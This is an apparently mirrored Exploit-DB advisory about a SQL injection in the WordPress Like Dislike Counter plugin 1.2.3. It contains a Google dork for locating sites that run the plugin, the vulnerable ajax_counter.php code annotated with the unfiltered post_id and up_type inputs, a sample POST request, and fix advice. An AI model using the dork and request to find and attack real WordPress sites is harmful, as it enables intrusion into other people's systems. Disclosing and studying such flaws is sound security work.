WordPress Plugin Like Dislike Counter 1.2.3 – SQL Injection

  • 作者: Att4ck3r.ir
    日期: 2014-09-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34553/
  • #################################################################################################
    #
    # Title: WordPress Like Dislike Counter Plugin SQL 
    Injection Vulnerability
    # Risk : High+/Critical
    # Exploit Author : XroGuE
    # Google Dork: 
    inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php 
    ANDplugins/pro-like-dislike-counter/ldc-ajax-counter.php
    # Plugin Version : 1.2.3
    # Plugin Name: Like Dislike Counter
    # Plugin Download Link : 
    http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
    # Vendor Home: www.wpfruits.com
    # Date : 2014/09/05
    # Tested in: Win7 - Linux
    #
    ##################################################################################################
    # This vulnerability is present in both versions of this plugin (Free and Pro).
    #
    # PoC :
    #
    # 
    http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
    #
    # Vulnerable Page : ajax_counter.php
    #
    #	if (!$changedDir)$changedDir = 
    preg_replace('|wp-content.*$|','',__FILE__);
    #	include_once($changedDir.'/wp-config.php');
    #	if(isset($_COOKIE['ul_post_cnt']))
    #	{
    #	$posts_present=$_COOKIE['ul_post_cnt'];
    #	}
    #	else
    #	{
    #	$posts_present=array();
    #	}
    # // Here ------------------------> Inputs are not filtered: post_id and up_type are read
    # // straight from $_POST with no type check, allow-list or escaping.
    #	$post_id=$_POST['post_id'];
    #	$up_type=$_POST['up_type'];
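    # // Here <------------------------
    # // Both values are then passed to update_post_ul_meta() and get_post_ul_meta() (not shown
    # // in this excerpt), which is presumably where they reach the SQL query. No nonce or login
    # // check appears in the excerpt before that point. A fix needs post_id cast to an integer
    # // and up_type compared against the fixed set of expected values before either call.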
    #	if($up_type=='c_like'||$up_type=='c_dislike')
    #	{
    #	$for_com='c_';
    #	}
    #	else
    #	{
    #	$for_com='';
    #	}
    #	if(!in_array($for_com.$post_id,$posts_present))
    #	{
    #	update_post_ul_meta($post_id,$up_type);
    #	}
    #	echo get_post_ul_meta($post_id,$up_type);
    #
    ##################################################################################################
    # POST 
    wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php 
    HTTP/1.1
    # Host: localhost
    # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) 
    Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21
    # Accept: */*
    # Accept-Language: en-US,en;q=0.5
    # Accept-Encoding: gzip, deflate
    # Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    # X-Requested-With: XMLHttpRequest
    # Referer: http://localhost/wp/
    # Content-Length: 24
    # Connection: keep-alive
    # Pragma: no-cache
    # Cache-Control: no-cache
    # post_id=1&up_type=like
    ##################################################################################################
    #
    # Found By : XroGuE
    # Website: http://www.Att4ck3r.ir
    # E-Mail : info[at]att4ck3r[Dot]ir
    #
    ##################################################################################################